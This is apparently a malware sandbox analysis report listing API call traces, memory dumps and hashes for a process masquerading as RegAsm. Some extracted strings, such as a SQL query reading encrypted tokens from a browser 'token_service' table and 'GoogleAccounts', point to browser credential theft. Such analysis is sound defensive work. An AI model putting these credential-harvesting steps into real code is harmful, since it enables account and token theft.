                                                                                                        • VirtualQueryEx.KERNEL32(?,?,?,0000001C), ref: 0040FA5C
                                                                                                        • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0040FBE3,?,00000000,00000000,?,?), ref: 0040FA6D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessQueryReadVirtual
                                                                                                        • String ID: @
                                                                                                        • API String ID: 3835927879-2766056989
                                                                                                        APIs
                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C282FFD
                                                                                                        • sqlite3_initialize.NSS3 ref: 6C283007
                                                                                                        • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C283032
                                                                                                        • sqlite3_mprintf.NSS3(6C2EAAF9,?), ref: 6C283073
                                                                                                        • sqlite3_free.NSS3(?), ref: 6C2830B3
                                                                                                        • sqlite3_mprintf.NSS3(sqlite3_get_table() called with two or more incompatible queries), ref: 6C2830C0
                                                                                                        Strings
                                                                                                        • sqlite3_get_table() called with two or more incompatible queries, xrefs: 6C2830BB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: sqlite3_mprintf$memcpysqlite3_freesqlite3_initializestrlen
                                                                                                        • String ID: sqlite3_get_table() called with two or more incompatible queries
                                                                                                        • API String ID: 750880481-4279182443
                                                                                                        APIs
                                                                                                        • TlsGetValue.KERNEL32(00000000,00000000,?,6C1D124D,00000001), ref: 6C1C8D19
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,6C1D124D,00000001), ref: 6C1C8D32
                                                                                                        • PL_ArenaRelease.NSS3(?,?,?,?,?,6C1D124D,00000001), ref: 6C1C8D73
                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,6C1D124D,00000001), ref: 6C1C8D8C
                                                                                                          • Part of subcall function 6C25DD70: TlsGetValue.KERNEL32 ref: 6C25DD8C
                                                                                                          • Part of subcall function 6C25DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C25DDB4
                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,6C1D124D,00000001), ref: 6C1C8DBA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
                                                                                                        • String ID: KRAM$KRAM
                                                                                                        • API String ID: 2419422920-169145855
                                                                                                        APIs
                                                                                                        • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C2C0EE6
                                                                                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C2C0EFA
                                                                                                          • Part of subcall function 6C1AAEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C1AAF0E
                                                                                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C2C0F16
                                                                                                        • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C2C0F1C
                                                                                                        • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C2C0F25
                                                                                                        • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C2C0F2B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
                                                                                                        • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                                                                        • API String ID: 2948422844-1374795319
                                                                                                        APIs
                                                                                                          • Part of subcall function 6C0CAB89: EnterCriticalSection.KERNEL32(6C11E370,?,?,?,6C0934DE,6C11F6CC,?,?,?,?,?,?,?,6C093284), ref: 6C0CAB94
                                                                                                          • Part of subcall function 6C0CAB89: LeaveCriticalSection.KERNEL32(6C11E370,?,6C0934DE,6C11F6CC,?,?,?,?,?,?,?,6C093284,?,?,6C0B56F6), ref: 6C0CABD1
                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0A4A68), ref: 6C0D945E
                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C0D9470
                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C0D9482
                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C0D949F
                                                                                                        Strings
                                                                                                        • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C0D947D
                                                                                                        • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C0D946B
                                                                                                        • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C0D9459
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325445154.000000006C090000.00000002.00000001.01000000.00000009.sdmp
                                                                                                        • Associated: 00000002.00000002.3325754871.000000006C10D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                        • Associated: 00000002.00000002.3325812764.000000006C11E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                        • Associated: 00000002.00000002.3325838597.000000006C122000.00000002.00000001.01000000.00000009.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
                                                                                                        • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
                                                                                                        • API String ID: 4042361484-1628757462
                                                                                                        • Opcode ID: a761b83083c9cc420b360cbfa373589873dd2516b5923751c2e217bab648e386
                                                                                                        • Instruction ID: 89b5de8be999744ccd30725b70b62d3c1ba5a5aaa9a93284568c6b920bf44b49
                                                                                                        • Opcode Fuzzy Hash: a761b83083c9cc420b360cbfa373589873dd2516b5923751c2e217bab648e386
                                                                                                        • Instruction Fuzzy Hash: 63012838A042008BE700DB5EEA26F4A33F49B0532DF154537E80687F42DA3DF5549957
                                                                                                        APIs
                                                                                                        • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C284DC3
                                                                                                        • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C284DE0
                                                                                                        Strings
                                                                                                        • misuse, xrefs: 6C284DD5
                                                                                                        • invalid, xrefs: 6C284DB8
                                                                                                        • %s at line %d of [%.10s], xrefs: 6C284DDA
                                                                                                        • API call with %s database connection pointer, xrefs: 6C284DBD
                                                                                                        • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C284DCB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: sqlite3_log
                                                                                                        • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                        • API String ID: 632333372-2974027950
                                                                                                        • Opcode ID: fb4f10f81b8a6ea9e28d10b7215aa0858f680ebea33a0e5a02f6a3ca1c767846
                                                                                                        • Instruction ID: ccea558c5ced9b936ac883bdbc1f33a05820d7f852ac0e28e0e50e63c43543b4
                                                                                                        • Opcode Fuzzy Hash: fb4f10f81b8a6ea9e28d10b7215aa0858f680ebea33a0e5a02f6a3ca1c767846
                                                                                                        • Instruction Fuzzy Hash: DAF0E919E1666D6BD700C125DC31F86379D4F0531BF8A09A2FD047BED3D205987882C1
                                                                                                        APIs
                                                                                                        • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C284E30
                                                                                                        • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C284E4D
                                                                                                        Strings
                                                                                                        • misuse, xrefs: 6C284E42
                                                                                                        • invalid, xrefs: 6C284E25
                                                                                                        • %s at line %d of [%.10s], xrefs: 6C284E47
                                                                                                        • API call with %s database connection pointer, xrefs: 6C284E2A
                                                                                                        • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C284E38
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: sqlite3_log
                                                                                                        • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                        • API String ID: 632333372-2974027950
                                                                                                        • Opcode ID: 1117682d1203ae9514179f5d9b64c92113bd53e89a3e33b1ab8fb915ded3c8f6
                                                                                                        • Instruction ID: cf25354fe2ce7ef50467e4c7aa7340869f6c5d42d01e4668b12aacd0e4ff2d62
                                                                                                        • Opcode Fuzzy Hash: 1117682d1203ae9514179f5d9b64c92113bd53e89a3e33b1ab8fb915ded3c8f6
                                                                                                        • Instruction Fuzzy Hash: B2F02715E4692D2BE7148126DC30F83378D4B1532BF8944B1FE0877ED2E305987842F1
                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00409BB2
                                                                                                          • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 00409BCF
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00409C7E
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00409C99
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpylstrlen$lstrcat$AllocLocal
                                                                                                        • String ID: AccountId$GoogleAccounts$GoogleAccounts$SELECT service, encrypted_token FROM token_service
                                                                                                        • API String ID: 3306365304-1713091031
                                                                                                        • Opcode ID: 23a8635a48a7421f52fb52e76b1e4f954d6a09d0e6bce8243b1f57598da2cf87
                                                                                                        • Instruction ID: bcd8a3c27cc20b2b0202687c0b5b9a5b34e989406908c304105e5c1fc2b99bb7
                                                                                                        • Opcode Fuzzy Hash: 23a8635a48a7421f52fb52e76b1e4f954d6a09d0e6bce8243b1f57598da2cf87
                                                                                                        • Instruction Fuzzy Hash: 45815171E40109ABCF01FFA5DE469DD77B5AF04309F511026F900B71E2DBB8AE898B99
                                                                                                        APIs
                                                                                                        • PR_SetError.NSS3(00000000,00000000,6C1F1444,?,00000001,?,00000000,00000000,?,?,6C1F1444,?,?,00000000,?,?), ref: 6C1F0CB3
                                                                                                          • Part of subcall function 6C25C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C25C2BF
                                                                                                        • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C1F1444,?,00000001,?,00000000,00000000,?,?,6C1F1444,?), ref: 6C1F0DC1
                                                                                                        • PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C1F1444,?,00000001,?,00000000,00000000,?,?,6C1F1444,?), ref: 6C1F0DEC
                                                                                                          • Part of subcall function 6C210F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C1B2AF5,?,?,?,?,?,6C1B0A1B,00000000), ref: 6C210F1A
                                                                                                          • Part of subcall function 6C210F10: malloc.MOZGLUE(00000001), ref: 6C210F30
                                                                                                          • Part of subcall function 6C210F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C210F42
                                                                                                        • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C1F1444,?,00000001,?,00000000,00000000,?), ref: 6C1F0DFF
                                                                                                        • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C1F1444,?,00000001,?,00000000), ref: 6C1F0E16
                                                                                                        • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C1F1444,?,00000001,?,00000000,00000000,?), ref: 6C1F0E53
                                                                                                        • PR_GetCurrentThread.NSS3(?,?,?,?,6C1F1444,?,00000001,?,00000000,00000000,?,?,6C1F1444,?,?,00000000), ref: 6C1F0E65
                                                                                                        • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C1F1444,?,00000001,?,00000000,00000000,?), ref: 6C1F0E79
                                                                                                          • Part of subcall function 6C201560: TlsGetValue.KERNEL32(00000000,?,6C1D0844,?), ref: 6C20157A
                                                                                                          • Part of subcall function 6C201560: EnterCriticalSection.KERNEL32(?,?,?,6C1D0844,?), ref: 6C20158F
                                                                                                          • Part of subcall function 6C201560: PR_Unlock.NSS3(?,?,?,?,6C1D0844,?), ref: 6C2015B2
                                                                                                          • Part of subcall function 6C1CB1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C1D1397,00000000,?,6C1CCF93,5B5F5EC0,00000000,?,6C1D1397,?), ref: 6C1CB1CB
                                                                                                          • Part of subcall function 6C1CB1A0: free.MOZGLUE(5B5F5EC0,?,6C1CCF93,5B5F5EC0,00000000,?,6C1D1397,?), ref: 6C1CB1D2
                                                                                                          • Part of subcall function 6C1C89E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C1C88AE,-00000008), ref: 6C1C8A04
                                                                                                          • Part of subcall function 6C1C89E0: EnterCriticalSection.KERNEL32(?), ref: 6C1C8A15
                                                                                                          • Part of subcall function 6C1C89E0: memset.VCRUNTIME140(6C1C88AE,00000000,00000132), ref: 6C1C8A27
                                                                                                          • Part of subcall function 6C1C89E0: PR_Unlock.NSS3(?), ref: 6C1C8A35
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1601681851-0
                                                                                                        • Opcode ID: a295e6ab5934fbc1e2fd1a7161a22231a31089f805e8d02719e0c8f76f490050
                                                                                                        • Instruction ID: fea756391d0ade58efeb24b70a1786abb2210257369c5b5ec94f685e4ccc87eb
                                                                                                        • Opcode Fuzzy Hash: a295e6ab5934fbc1e2fd1a7161a22231a31089f805e8d02719e0c8f76f490050
                                                                                                        • Instruction Fuzzy Hash: 7251A4F6E002045FEB009F64EC81ABB37E8AF55258F550064EC199BB12FB35ED19C6A2
                                                                                                        APIs
                                                                                                        • sqlite3_value_text.NSS3(?,?), ref: 6C1A6ED8
                                                                                                        • sqlite3_value_text.NSS3(?,?), ref: 6C1A6EE5
                                                                                                        • memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6C1A6FA8
                                                                                                        • sqlite3_value_text.NSS3(00000000,?), ref: 6C1A6FDB
                                                                                                        • sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6C1A6FF0
                                                                                                        • sqlite3_value_blob.NSS3(?,?), ref: 6C1A7010
                                                                                                        • sqlite3_value_blob.NSS3(?,?), ref: 6C1A701D
                                                                                                        • sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6C1A7052
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
                                                                                                        • String ID:
                                                                                                        • API String ID: 1920323672-0
                                                                                                        • Opcode ID: 53eaf43956ea73d24c4b836270b090c402e09ebdebc3462e8b33d7b5b8613d28
                                                                                                        • Instruction ID: e4743ef145ef7aa46bb6ad512005203e45c1e6886971ee25b2cd2ba307362287
                                                                                                        • Opcode Fuzzy Hash: 53eaf43956ea73d24c4b836270b090c402e09ebdebc3462e8b33d7b5b8613d28
                                                                                                        • Instruction Fuzzy Hash: 2A61E4B9E052098BDB00CFE9C9507EFB7B2AF49308F1841A5D815AB755E7359D07CBA0
                                                                                                        APIs
                                                                                                        • SECOID_FindOID_Util.NSS3(?,?,FFFFE005,?,6C217313), ref: 6C218FBB
                                                                                                          • Part of subcall function 6C2107B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C1B8298,?,?,?,6C1AFCE5,?), ref: 6C2107BF
                                                                                                          • Part of subcall function 6C2107B0: PL_HashTableLookup.NSS3(?,?), ref: 6C2107E6
                                                                                                          • Part of subcall function 6C2107B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C21081B
                                                                                                          • Part of subcall function 6C2107B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C210825
                                                                                                        • SECOID_FindOID_Util.NSS3(?,?,?,FFFFE005,?,6C217313), ref: 6C219012
                                                                                                        • SECOID_FindOID_Util.NSS3(?,?,?,?,FFFFE005,?,6C217313), ref: 6C21903C
                                                                                                        • SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,FFFFE005,?,6C217313), ref: 6C21909E
                                                                                                        • PORT_ArenaGrow_Util.NSS3(?,?,?,00000001,?,?,?,?,?,?,FFFFE005,?,6C217313), ref: 6C2190DB
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,FFFFE005,?,6C217313), ref: 6C2190F1
                                                                                                          • Part of subcall function 6C2110C0: TlsGetValue.KERNEL32(?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C2110F3
                                                                                                          • Part of subcall function 6C2110C0: EnterCriticalSection.KERNEL32(?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C21110C
                                                                                                          • Part of subcall function 6C2110C0: PL_ArenaAllocate.NSS3(?,?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C211141
                                                                                                          • Part of subcall function 6C2110C0: PR_Unlock.NSS3(?,?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C211182
                                                                                                          • Part of subcall function 6C2110C0: TlsGetValue.KERNEL32(?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C21119C
                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000,?,?,?,FFFFE005,?,6C217313), ref: 6C21906B
                                                                                                          • Part of subcall function 6C25C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C25C2BF
                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000,?,FFFFE005,?,6C217313), ref: 6C219128
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
